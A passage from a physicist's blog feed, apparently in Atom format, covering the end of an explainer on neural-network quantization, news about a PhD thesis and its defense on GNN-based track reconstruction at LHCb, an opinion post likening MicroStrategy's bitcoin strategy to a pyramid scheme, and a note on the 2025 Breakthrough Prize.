<p>where \(x_q \) is the quantized representation of float \(x \), and float \(S \) is the scale quantization parameter. The quantized value can then be calculated as follows:</p>

<p>\[
    x_q = \text{round}(x/S) \,.
\]</p>

<p>Finally, any float values outside interval \([-\alpha,\alpha] \) are clipped, so for any float \(x \):</p>

<p>\[
    x_q = \text{clip}(\text{round}(x/S), -\alpha_q, \alpha_q) \,,
\]</p>

<p>where \(\alpha_q = \text{round}(\alpha/S) \), and \(\text{clip}(x, x_{\text{min}}, x_{\text{max}}) \) denotes the clamp (or clipping) function between \(x_{\text{min}} \) and \(x_{\text{max}} \).</p>

<h3 id="calibration-and-quantization-types">Calibration and Quantization Types</h3>

<p>Calibration is the process during which the ideal values for the quantization parameters, the scale \(S \) in our example, are chosen based on the distribution of the input values. For example, as shown in Fig. 13, based on the range of the input values, the interval limits \([-\alpha,\alpha] \) are chosen, and the value of \(S \) is chosen such that \(\alpha \) is mapped to the highest value the quantized type can take. For the values shown, and according to the equations above, the scale will have to be \(S = 10.8 / 127 \). Due to the interval being symmetric, from the 256 available values in INT8, we effectively only have half the numbers to represent positive values, while the rest are reserved for the zero point and the negative values.</p>

<p><img src="/assets/ml-gnn-intro/quant.png" alt="quant" /></p>

<p><strong>Figure 13:</strong> Illustration of the process of symmetric quantization. The scale is chosen to best fit the input values to be quantized. Figure from <a href="https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-quantization">[Ref]</a>.</p>

<p>For the case of neural networks, the input values of the quantization are the weights and the activations of the model. For weights, the process is quite easy since the actual range can be easily calculated at the time of quantization. For activations, however, things are a bit more complicated, and the approaches are different depending on the type of quantization pursued:</p>

<ul>
  <li><strong>Post-Training Quantization (PTQ):</strong> The quantization of the weights and activations is performed after the training of the model in full precision.</li>
  <li><strong>Quantization-Aware Training (QAT):</strong> The quantization is performed during the training process.</li>
</ul>

<p>Depending on the type of quantization, a different method for the calibration of the activations is used <a href="https://huggingface.co/docs/optimum/en/concept_guides/quantization">[Ref]</a>:</p>

<ul>
  <li>Static PTQ: At the time of quantization, a representative sample of the data is passed through the model and the activation values are recorded, using “observers” placed at the activations. After several forward passes, the ranges of the computations can be deduced using some calibration technique.</li>
  <li>Dynamic PTQ: For each activation, the range is computed at runtime. However, this can prove slow and even not an option on several types of hardware.</li>
  <li>QAT: The ranges of computations are computed during training. “Fake quantize” operators simulate the effects of quantization during training, enabling the model to adjust and become robust to the errors introduced by the quantization process.</li>
</ul>

<h2 id="conclusion">Conclusion</h2>

<p>In this article, I presented a brief history of machine learning, and sketched, from the ground up, the inner workings of graph neural networks. Quantization was also introduced.</p>

<p>This article is one of the chapters of my PhD thesis titled: <strong>“Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures”</strong>. The full text can be found here: <a href="/news/phd-thesis/">PhD Thesis</a>. In the main results part of this work, GNNs were used to perform the task of track reconstruction, in the context of the Large Hadron Collider at CERN.</p>]]></content><author><name> </name></author><category term="Blog" /><category term="Machine Learning" /><category term="Graph Neural Networks" /><category term="Deep Learning" /><summary type="html"><![CDATA[Brief introduction to graph neural networks, starting from machine learning, and sketching, from the ground up, the inner workings of graph neural networks.]]></summary></entry><entry><title type="html">PhD Thesis Now Online</title><link href="https://fotisgiasemis.com/news/phd-thesis/" rel="alternate" type="text/html" title="PhD Thesis Now Online" /><published>2025-08-12T00:00:00+02:00</published><updated>2025-08-12T00:00:00+02:00</updated><id>https://fotisgiasemis.com/news/phd-thesis</id><content type="html" xml:base="https://fotisgiasemis.com/news/phd-thesis/"><![CDATA[<p>I’m happy to share that the pre-defense version of my PhD thesis is now publicly available on <a href="https://doi.org/10.48550/arXiv.2508.07423">arXiv</a>!</p>

<p>The thesis</p>

<blockquote>
  <p><strong>Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures</strong></p>
</blockquote>

<p>explores how modern machine learning models can be deployed efficiently in high-energy physics environments, with a focus on maximizing <strong>throughput</strong> and minimizing <strong>energy</strong> consumption.</p>

<p>Here’s a peek at the table of contents:</p>

<p><a href="/assets/pdf/giasemis_phd_thesis_toc.pdf"><img src="/assets/pdf/giasemis_phd_thesis_toc.pdf" alt="toc" /></a></p>

<p>You can:</p>

<ul>
  <li>
    <p>Read more about the <strong>project</strong> here: <a href="/projects/#tracking-with-graph-neural-networks">Project</a></p>
  </li>
  <li>
    <p>Read the <strong>ML intro chapter</strong> here: <a href="/blog/ml-gnn-intro/">From Machine Learning to Graph Neural Networks and Quantization – An Introduction</a></p>
  </li>
  <li>
    <p>Read the <strong>HPC intro chapter</strong> here: <a href="/blog/hpc-gpu-fpga-intro/">From GPUs to FPGAs – An Introduction to High-Performance Computing</a></p>
  </li>
  <li>
    <p>Read the <strong>Physics intro</strong> chapter here: <a href="/blog/accelerator-heavy-flavor-physics">Accelerator and Heavy Flavor Physics – Introductory Concepts</a></p>
  </li>
  <li>
    <p>Read the <strong>full thesis</strong> here: <a href="https://doi.org/10.48550/arXiv.2508.07423">arXiv.2508.07423</a></p>
  </li>
  <li>
    <p>The <strong>PhD defense</strong> is <a href="/news/thesis-defense-scheduled">scheduled for the 5th of September, 2025</a> and you can find the page of the defense (viva) <a href="https://indico.in2p3.fr/e/fotis-giasemis-phd-defense">here</a>.</p>
  </li>
</ul>

<p>If you have any thoughts, questions, or feedback, feel free to reach out.</p>

<p><img src="/assets/images/front.png" alt="front" style="width:65%;" /></p>]]></content><author><name> </name></author><category term="News" /><category term="CERN" /><category term="PhD" /><category term="Machine Learning" /><category term="GPU" /><category term="FPGA" /><summary type="html"><![CDATA[Thesis now online: Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures.]]></summary></entry><entry><title type="html">Is MicroStrategy a Bitcoin Pyramid Scheme?</title><link href="https://fotisgiasemis.com/blog/is-microstrategy-a-bitcoin-pyramid-scheme/" rel="alternate" type="text/html" title="Is MicroStrategy a Bitcoin Pyramid Scheme?" /><published>2025-06-15T00:00:00+02:00</published><updated>2025-06-15T00:00:00+02:00</updated><id>https://fotisgiasemis.com/blog/is-microstrategy-a-bitcoin-pyramid-scheme</id><content type="html" xml:base="https://fotisgiasemis.com/blog/is-microstrategy-a-bitcoin-pyramid-scheme/"><![CDATA[<p><a href="https://en.wikipedia.org/wiki/MicroStrategy">MicroStrategy Inc.</a> (ticker <code class="language-plaintext highlighter-rouge">MSTR</code>), recently renamed <a href="https://www.strategysoftware.com/">Strategy</a>, was founded in 1989 as a software company. Today, it presents itself as a <strong>“bitcoin treasury”</strong>—a company whose core business is essentially holding bitcoin. As of 2025, it is the <a href="https://bitbo.io/treasuries/#public">largest</a> corporate bitcoin holder in the world, owning more than 500,000 bitcoins with an estimated value of roughly <strong>$60B</strong>.</p>

<p><img src="/assets/images/mstr.png" alt="mstr" />
<em>Image generated using OpenAI’s DALL·E, June 2025.</em></p>

<p>The company is growing at a <a href="https://www.bloomberg.com/news/articles/2024-10-30/microstrategy-outgaining-nvidia-obscures-rising-concern-over-stock-premium">mind-bending rate</a>—<strong>its stock has surged by more than 2,000% since 2022</strong>, outperforming nearly every major U.S. stock, including Nvidia. How is this happening?</p>

<p>The company’s <a href="https://www.forbes.com/sites/mauriciodibartolomeo/2024/12/02/how-wall-street-powers-microstrategys-bitcoin-flywheel/">current business model</a> can be described by a <a href="https://bitwiseinvestments.eu/blog/crypto-research/is-micro-strategy-a-risk-for-bitcoin/">positive feedback loop process</a>:</p>

<ul>
  <li><strong>Borrow</strong> money, primarily by issuing new stock.</li>
  <li>Use the proceeds to <strong>buy bitcoin</strong>.</li>
  <li>This increases both the company’s bitcoin holdings and (in theory) bitcoin’s price, thereby <strong>boosting the company’s market capitalization</strong>—which can then be used to raise more capital and <strong>repeat the cycle</strong>.</li>
</ul>

<p>This feedback loop has been nicknamed the <a href="https://www.bloomberg.com/opinion/articles/2024-11-22/bitcoin-surge-microstrategy-s-infinite-money-glitch-won-t-last">“infinite money glitch”</a>. But let’s be clear: it’s not sustainable. Here’s why.</p>

<h2 id="a-simple-example">A Simple Example</h2>

<p>Let’s walk through an illustrative case, as in examples shown <a href="https://youtu.be/P5LKZ1-6BWM">here</a> and <a href="https://www.youtube.com/watch?v=RIWax9-4U2k">here</a>:</p>

<p>Suppose a company owns 10 units of a fictional cryptocurrency called <strong>B Coin</strong>. Each B Coin is worth $1. The company has 1,000 shares outstanding, priced at $0.50 each. This means each share entitles its holder to:</p>

\[\frac{10}{1000} = 1\% \text{ of a B Coin}\]

<table>
  <thead>
    <tr>
      <th style="text-align: center">Assets</th>
      <th style="text-align: center">Shares Outstanding</th>
      <th style="text-align: center">Value per Share (B Coin)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">10 B Coins</td>
      <td style="text-align: center">1,000</td>
      <td style="text-align: center">1%</td>
    </tr>
  </tbody>
</table>

<p>Now imagine the company raises $10 by issuing 20 new shares at the current price of $0.50. It uses that $10 to buy 10 more B Coins. The new situation:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center">Assets</th>
      <th style="text-align: center">Shares Outstanding</th>
      <th style="text-align: center">Value per Share (B Coin)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">20 B Coins</td>
      <td style="text-align: center">1,020</td>
      <td style="text-align: center">~1.96%</td>
    </tr>
  </tbody>
</table>

<p>Suddenly, the <strong>assets per share</strong> have nearly doubled—from 1% to ~1.96% of a B Coin. That’s a <strong>96% increase</strong>. Where did this extra value come from?</p>

<p>It came from the <strong>new investors</strong>.</p>

<p>Initially, a share costing $0.50 corresponds to 50% of a B coin. However, instead of buying the B coin itself, the latecomers, by buying the company’s share, end up with only 1.96% of a B coin instead. They drastically overpaid. This is actually the premium that investors pay in order to hold MSTR stock instead of holding bitcoin. Meanwhile, <strong>early shareholders benefited</strong> from the dilution and saw their asset-per-share value increase.</p>

<p>This process can continue as long as new buyers are willing to join in. But at some point, <strong>someone will be the last buyer</strong>, left holding overpriced shares when the music stops.</p>

<p>This mechanism bears resemblance to how <strong>pyramid schemes</strong> operate: earlier participants benefit from the contributions of newer ones.</p>

<p>A question remains:</p>

<blockquote>
  <p><strong>What will happen when the price of bitcoin eventually crashes?</strong></p>
</blockquote>

<p>A significant drop in the value of bitcoin would likely lead to a decline in MicroStrategy’s stock price, <strong>compressing the premium</strong> at which the company trades relative to its bitcoin holdings. This could slow—or even reverse—the “flywheel” feedback loop described above, potentially triggering a <strong>vicious cycle that may lead the company to a spectacular crash</strong>. Bitcoin itself could also be affected by such a collapse.</p>

<h2 id="conclusion">Conclusion</h2>

<p>Jumping on the MSTR wave might indeed seem tempting, especially considering the current hype around the company and its eye-catching returns. However, investing in a company should be backed by <strong>research and fundamentals</strong>. Potential investors are encouraged to think carefully before taking any action.</p>

<blockquote>
  <p><strong>Disclaimer:</strong> The views expressed in this post are solely my own, based on publicly available information. They do not represent the views of any current or past employer. This content is not financial advice and does not make allegations of fraud or illegality.</p>
</blockquote>]]></content><author><name> </name></author><category term="Blog" /><category term="Financial Markets" /><category term="Quant" /><category term="Crypto" /><summary type="html"><![CDATA[An analysis of MicroStrategy's bitcoin-centric business model and its resemblance to pyramid schemes through dilution and speculative capital loops.]]></summary></entry><entry><title type="html">Thesis Defense Scheduled – September 5, 2025</title><link href="https://fotisgiasemis.com/news/thesis-defense-scheduled/" rel="alternate" type="text/html" title="Thesis Defense Scheduled – September 5, 2025" /><published>2025-06-10T00:00:00+02:00</published><updated>2025-06-10T00:00:00+02:00</updated><id>https://fotisgiasemis.com/news/thesis-defense-scheduled</id><content type="html" xml:base="https://fotisgiasemis.com/news/thesis-defense-scheduled/"><![CDATA[<p>I’m happy to announce that the date for my <strong>PhD defense</strong> has been decided for Friday the 5th of September 2025. My thesis titled</p>

<blockquote>
  <p><strong>“Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures”</strong></p>
</blockquote>

<p>describes my work, along my collaborators, in developing <a href="https://doi.org/10.1088/1748-0221/19/12/P12022">ETX4VELO</a>, a <strong>Graph Neural Network-based</strong> pipeline for real-time track reconstruction at 40 MHz inside the LHCb first-level trigger. The pipeline was developed in <strong>PyTorch</strong>, implemented end to end on <strong>GPUs</strong> using the C++ CUDA framework by Nvidia, and partially implemented on <strong>FPGAs</strong> using the translation framework <a href="https://github.com/fastmachinelearning/hls4ml">HLS4ML</a>, which transforms PyTorch/Keras code to firmware for low-latency, <strong>high-throughput</strong> inference on FPGAs. For more information on the project you can also see my <a href="/projects/#-etx4velo-tracking-with-gnns">Projects page</a>. The thesis was conducted under the co-supervision of <a href="https://inspirehep.net/authors/1057204">Vava Gligorov</a> (LPNHE/CERN) and <a href="https://www.lip6.fr/actualite/personnes-fiche.php?ident=P824&amp;LANG=en">Bertrand Granado</a> (LIP6/Sorbonne Université).</p>

<p>More updates and a link to the manuscript will follow soon.</p>

<p><img src="/assets/images/front.png" alt="front" style="width:65%;" /></p>]]></content><author><name> </name></author><category term="News" /><category term="CERN" /><category term="PhD" /><category term="Machine Learning" /><category term="GPU" /><category term="FPGA" /><summary type="html"><![CDATA[Thesis defense scheduled: Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures.]]></summary></entry><entry><title type="html">The 2025 Breakthrough Prize in Fundamental Physics Awarded to the LHCb Collaboration</title><link href="https://fotisgiasemis.com/news/breakthrough-prize-2025/" rel="alternate" type="text/html" title="The 2025 Breakthrough Prize in Fundamental Physics Awarded to the LHCb Collaboration" /><published>2025-04-08T00:00:00+02:00</published><updated>2025-04-08T00:00:00+02:00</updated><id>https://fotisgiasemis.com/news/breakthrough-prize-2025</id><content type="html" xml:base="https://fotisgiasemis.com/news/breakthrough-prize-2025/"><![CDATA[<p>The <strong>LHCb collaboration</strong>, together with the other three main Large Hadron Collider collaborations, <strong>ATLAS, CMS and ALICE</strong>, has been awarded the 2025 <a href="https://breakthroughprize.org/">Breakthrough Prize</a> in Fundamental Physics:</p>

<blockquote>
  <p>For detailed measurements of Higgs boson properties confirming the symmetry-breaking mechanism of mass generation, the discovery of new strongly interacting particles, the study of rare processes and matter-antimatter asymmetry, and the exploration of nature at the shortest distances and most extreme conditions at CERN’s Large Hadron Collider.</p>
</blockquote>

<p>The prize has been awarded to all current and former members of the four collaborations who have authored Run 2 data papers by 15 July 2024.</p>

<p>As stated in the <a href="https://breakthroughprize.org/Laureates/1/P1/Y2025">official page</a>, the $3 million prize is allocated to ATLAS ($1 million), CMS ($1 million), ALICE ($500,000) and LHCb ($500,000). The prize money will be used by the collaborations to offer <strong>grants for doctoral students</strong> from member institutes to spend research time at CERN, giving the students experience working at the forefront of science and new expertise to bring back to their home countries and regions. The name of each winner can be found on the experiment pages below.</p>

<p>The full list of the LHCb laureates, can be found in the <a href="https://breakthroughprize.org/Laureates/1/L3995">LHCb subpage</a>.</p>

<p>Read more in the <a href="https://breakthroughprize.org/News/91">prize announcement</a> and in the <a href="https://home.cern/news/press-release/knowledge-sharing/lhc-experiment-collaborations-cern-receive-breakthrough-prize">CERN press release</a>.</p>]]></content><author><name> </name></author><category term="News" /><category term="LHCb" /><category term="CERN" /><summary type="html"><![CDATA[The 2025 Breakthrough Prize has been awarded to the main CERN collaborations, including LHCb.]]></summary></entry></feed>